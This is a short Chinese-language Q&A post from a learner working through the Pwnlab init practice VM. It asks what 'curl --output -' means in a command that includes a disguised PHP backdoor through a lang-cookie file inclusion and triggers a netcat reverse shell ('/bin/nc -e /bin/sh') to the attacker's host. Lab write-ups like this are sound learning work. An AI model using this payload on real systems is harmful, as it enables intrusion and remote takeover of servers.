【发布时间】:2020-06-20 23:42:42
【问题描述】:
我在做一个名为 Pwnlab init 的实践渗透测试虚拟机时使用了以下 curl 查询。查询的目的是让index.php页面访问png文件,其实是一个伪装的php后门脚本,然后让被攻击机器发出netcat命令连接我的攻击机器。只有在研究了其他人如何成功完成虚拟机之后,我才知道使用此查询。我了解整个查询,除了第一部分curl --output -。有人可以帮我解决这部分查询的作用吗?
curl --output - -b lang=../upload/6a8c0c37efded4d620a5c59990f07b90.png \
http://xxx.xxx.xxx.xxx/index.php?cmd=/bin/nc+-e+/bin/sh+xxx.xxx.xxx.xxx+xxxx
【问题讨论】:
标签: php curl penetration-testing reverse-shell